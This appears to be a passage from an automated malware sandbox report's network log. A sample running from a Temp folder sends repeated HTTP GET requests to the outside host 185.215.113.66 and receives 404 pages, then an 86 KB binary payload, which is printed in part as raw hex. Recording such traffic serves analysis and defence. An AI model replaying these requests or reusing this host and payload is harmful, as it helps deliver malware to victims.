                                                                        Data Ascii: {xdSH`m&xEdLZ9 3EdX9T7fI<hd^g?alKUw$Ro.ewU7jKLQs?=~c=x+G#s6W.V{r-tFU(FC_/nQaK5T,_2fn0sq_{?*V$,V{gDi
                                                                        Apr 24, 2024 10:08:46.113097906 CEST1289INData Raw: d3 ba 70 f8 7b 03 35 cc af 43 6f 96 fe 29 a4 13 f9 a5 28 c9 f9 63 7b 67 2b eb d0 09 9b 5b 1b ef 51 89 bd 83 f1 27 eb 08 c1 15 b3 4a c8 26 45 e3 c0 aa d5 58 94 33 f2 74 b2 57 37 5a 8b d3 4c c0 38 03 d2 64 c7 b7 c6 bf e7 08 18 8c c4 10 da 14 0b 1f
                                                                        Data Ascii: p{5Co)(c{g+[Q'J&EX3tW7ZL8dI!-Ty'G>)W8r,QE%CIFhF>3ku!Z}5bdr^A^v1")r$MAhehC5q"BU"$tA"
                                                                        Apr 24, 2024 10:08:46.113136053 CEST1289INData Raw: e5 f7 c7 26 bc 85 8a 6c c9 58 78 e2 3e c4 d1 9c 5e 13 f1 b8 f3 3d c1 c1 1a b0 95 ab 3e 96 bb b4 ec d0 8e 14 c0 52 53 0f ca 6a 63 d8 43 ab a0 f9 01 93 f0 18 a9 56 0e 9c 6b 39 49 79 6c aa b2 79 cb fb 1d 18 e3 81 32 de 3a e6 19 41 15 ba 92 06 5d 7d
                                                                        Data Ascii: &lXx>^=>RSjcCVk9Iyly2:A]}-,.!$%G*`O<Qlqt~Xv,l%>8J#|9tKT><}[^;n]/JuLRg\9SI=$@:@yw3$``T5=9a'gew1
                                                                        Apr 24, 2024 10:08:46.113173962 CEST1289INData Raw: 68 69 89 81 7c 2d 98 58 e2 47 ac 6a d7 bd 10 49 61 d9 ce 1c 44 05 52 88 7f 72 d7 f7 39 59 c9 55 2f c3 1b 07 fd b5 e8 c7 d3 52 32 5d bd fc 01 5c ff ac c9 64 77 ab a9 5b ad a2 0d dd d8 36 ae 57 ad 3e 77 fa 7b a6 54 1f 51 e7 4b 93 50 4a 66 44 3a 52
                                                                        Data Ascii: hi|-XGjIaDRr9YU/R2]\dw[6W>w{TQKPJfD:R=u`4nf_t0H[(=m(!Y)Sj0)PR*.FBoLjlGtnNa)9Q_nS4<0ql1('^qzw^ ?}k3KJS<
                                                                        Apr 24, 2024 10:08:46.113215923 CEST1289INData Raw: f2 7d da 93 7a 3a 14 25 2b 44 e3 ab 9b 5a 60 0c ae e0 95 34 a7 43 92 15 80 58 9c 5d ac cf 08 bd b6 75 fb 90 62 4c 39 23 dc 8d f5 44 f2 bd dc 65 c1 d8 1b 97 41 c9 76 8c bf f0 a2 c0 e2 58 d9 2e 5f 8f 50 91 46 17 88 27 54 c2 c0 99 de db cb 81 fd 2b
                                                                        Data Ascii: }z:%+DZ`4CX]ubL9#DeAvX._PF'T+gW+Sfs7AOL#.#Z,*#Y6)i%[){#G2/DrWyXTTS_a21zs{DOVX]e){J}Rx}{a]*!qk%wDv
                                                                        Apr 24, 2024 10:08:46.113254070 CEST1289INData Raw: ce 1e ad 79 cb c8 53 17 44 a1 fb 59 e4 97 27 7c 4d f1 ee 2e 3f 59 6d 99 27 99 ae 80 74 c9 a1 5e db 58 83 4a d9 f7 c4 43 b2 53 12 d9 ca 23 56 87 1f 61 99 51 97 21 4a fb f1 fe 44 5b 59 6e 44 7a 5d a0 69 d3 99 4b 80 48 a6 cc 67 45 82 d8 79 6a 2f 29
                                                                        Data Ascii: ySDY'|M.?Ym't^XJCS#VaQ!JD[YnDz]iKHgEyj/)$FowfW_x"#UU4Ca/H:!]2?3khpQY9bw^S`y6oPFh&iQNm%&gw>>GD`b
                                                                        Apr 24, 2024 10:08:46.113311052 CEST1289INData Raw: b8 1a ef 7a 58 1e 2a 5a f0 ca a0 98 f4 93 fa 72 45 df 40 f4 39 37 e1 f9 0d 4d 2c e2 a7 80 52 67 ff 64 a0 6e cb f7 15 17 66 a9 48 a3 58 85 7c 8e 14 64 16 ef d3 0e fc 99 ed f1 18 a7 67 41 ac 1e 1f 8f 7d 33 8f 5e e2 ba a4 98 30 4a 97 b6 3f 2b 69 2d
                                                                        Data Ascii: zX*ZrE@97M,RgdnfHX|dgA}3^0J?+i-${*2|w'yc|]Agx07MW&<$-+WEd4$ySsh7o%X*D FQA5${`?+L9m|'D^
                                                                        Apr 24, 2024 10:08:46.113351107 CEST1289INData Raw: 75 5c 5e a0 0b 76 65 93 a0 62 d6 54 b0 02 66 24 b4 8d 51 47 5e 14 01 6e fb 0d 22 05 69 69 05 41 6a 9a d6 7b a2 25 a8 b4 03 44 fc f6 0b 97 87 1f 32 f3 e3 e9 7a e4 b1 f5 00 a9 0d fe 64 a3 f9 bc 8e 83 ea b9 b7 09 87 3c 51 35 b9 6b ad eb 85 d5 24 b5
                                                                        Data Ascii: u\^vebTf$QG^n"iiAj{%D2zd<Q5k$h!\'0'#ORZo3.,U`9k,zh@NJv:>T<7!QazBdV(>Pg??qL2?Rr)\'[LYM`$
                                                                        Apr 24, 2024 10:08:46.113405943 CEST1289INData Raw: a5 d8 15 2a 35 55 70 8c 74 ac 02 e6 0b c7 b2 65 ec 18 44 cc a0 61 15 44 ab c5 a7 92 a5 c9 e5 73 5c 0a e1 72 bd 6a 4f 72 b8 57 56 47 bf 55 10 96 ba 13 54 e1 d4 0a 19 50 3e 36 02 58 83 4f 97 d7 ce 0c 9c 61 47 53 85 df f9 19 3c d8 cc 9a 11 f5 ce c9
                                                                        Data Ascii: *5UpteDaDs\rjOrWVGUTP>6XOaGS<S)QGKv3A?)R,YrZBmd.6=\,{'ut|.G%umnnfE~dT=D-%7}=]V#+W$Bh
                                                                        Apr 24, 2024 10:08:46.467940092 CEST1289INData Raw: dc b2 d8 2f 48 af 15 31 37 75 9b 82 b2 90 3a 8b 99 d6 d0 f7 73 0f 16 fa 34 16 42 6b ba 11 83 7a 5a af 85 2b ba 2f 96 f6 9a 44 06 89 df 25 19 4b b7 62 2e 01 67 be b2 1e ae b4 99 71 f0 2c 33 6e e9 78 d2 39 3e b3 b1 d8 c6 38 47 81 bc 09 26 9c b5 2a
                                                                        Data Ascii: /H17u:s4BkzZ+/D%Kb.gq,3nx9>8G&*?~SDrd g&YF41zFI>lWgy.mfmd&pC?t/VazmMQrI;\BEj[zm}/1M>H%


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.649744185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:08:48.481939077 CEST166OUTGET /2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:08:48.816747904 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:08:48 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.649745185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:08:51.186669111 CEST166OUTGET /3 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:08:51.522084951 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:08:51 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.649746185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:08:53.891180038 CEST166OUTGET /4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:08:54.222799063 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:08:54 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.649748185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:08:57.672339916 CEST166OUTGET /5 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:08:58.008332014 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:08:57 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.649749185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:09:00.391463041 CEST166OUTGET /6 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:09:00.726875067 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:09:00 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.649767185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:10:17.043627977 CEST166OUTGET /1 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:10:17.378603935 CEST1289INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:10:17 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 86272
                                                                        Last-Modified: Tue, 23 Apr 2024 21:15:20 GMT
                                                                        Connection: keep-alive
                                                                        ETag: "662824e8-15100"
                                                                        Accept-Ranges: bytes
                                                                        Data Raw: a8 4a f5 c3 4d 1e 89 ed 25 ad 4f 3b 68 ed 08 ba 62 02 f5 3e e5 71 7c d2 8a 81 92 a8 64 31 86 38 dc e1 cd 87 12 04 19 ea d1 c9 79 a1 00 a8 7a b6 06 d8 d2 d1 ad 21 c1 69 e6 d6 73 7e b2 94 f7 80 9f 96 01 92 0f 8b 13 23 cc ff 38 49 0f 77 72 a8 da 4b 60 7b d1 04 ee ff a5 bd 8e cf 56 23 15 db 17 a4 73 e1 bd 8f fe f3 80 6b ec 3f ea d0 f3 21 3e fb 3a e6 f4 0d 0f f0 0c ce 5b c5 d1 c7 9d 08 74 55 7a 82 54 f5 5d 3c b7 18 6e 69 67 6b 3f 75 a1 18 db 21 dd 6a 9a ea b7 d9 50 cc e4 e7 e5 22 d3 3c 53 a6 42 90 c9 d5 08 4e 78 44 15 b0 d8 bf 11 7c 56 cd 0f a1 28 44 ae 62 96 bf f4 fc ef 16 f3 bd b7 1d 44 de c3 a1 21 23 23 fc 67 9c ac 93 34 43 5f 0f 8f b2 fd f7 8c 65 bd 2f 15 e0 fd 81 71 50 7a 3d 53 81 55 c5 77 d6 a0 07 8f 42 a2 b4 18 8a 33 af 44 b2 6b 07 89 00 c0 1c cc ce 53 b0 0f 52 ce f7 63 3f c2 db 1b fc b1 d5 3d 1d 42 1c 82 ac 44 97 03 1c 77 0d 6b 9c b0 2f bb cf ed b5 4c 09 e1 72 99 31 95 9c 7b 73 b7 0a c2 b5 10 b2 4a 9f 67 95 1e e8 81 48 04 52 34 8c 59 e3 30 58 90 ca 24 69 0c b0 4a 33 a0 0c c1 76 c4 90 62 96 1d 8a 1e 09 f9 39 be dc 6d c2 97 a0 77 10 d2 08 01 b2 62 6f be e1 f6 f7 1f a7 65 08 ad 7a 6e bf cd b2 fb 55 9c 62 87 56 eb 2c 61 60 52 08 3a 90 e5 37 02 40 df 6f 74 b3 3b bf 2a e7 47 7a 74 5f 4c b1 f5 ec 9b 7f 43 73 a2 6b ed e6 be e8 c7 6a 4a ea cf 80 8e 68 e3 ff a5 3b 6e d6 29 91 f5 5d e6 48 22 3e c5 72 37 58 b6 4a 03 0c 3f 19 0a d4 79 9e fc 81 35 ce ca 88 5a 9f 27 e0 e2 87 d5 86 4a 4b c9 f4 20 64 dc e4 d5 26 65 eb 09 43 ae a1 26 ec 1a b5 a1 2f db 92 db ee 1c 5a ba 98 65 7e e7 87 da e2 b0 fc e3 90 8b 2c 39 51 9a f3 9e 48 3d 38 9c b6 45 62 0c 6a 63 8e fb 6d df 94 67 86 41 9f 01 54 7b a5 e6 2b d8 7a f1 84 fc 52 c2 33 fd 9c 1d 5a 35 12 6f 9e 42 90 ee 6c a9 0a 2b 43 05 ae a5 bb 4b f7 c6 10 f8 1b 37 57 de 22 ff d5 43 f1 bf eb 24 89 f0 17 6f b2 5f aa 96 b8 a8 69 58 64 cb ac f8 30 91 64 77 39 e7 de fc 05 aa 44 59 3e 23 09 75 9e a2 d2 05 bc 6e 50 e8 72 f6 ee ae 96 0d d8 21 15 51 57 d7 df 22 90 98 d1 4a 32 f6 ff 63 3d dd dc e6 71 7e ab 94 c2 21 7e 76 8a b6 d2 0a 70 9e b0 76 68 4c b0 9c 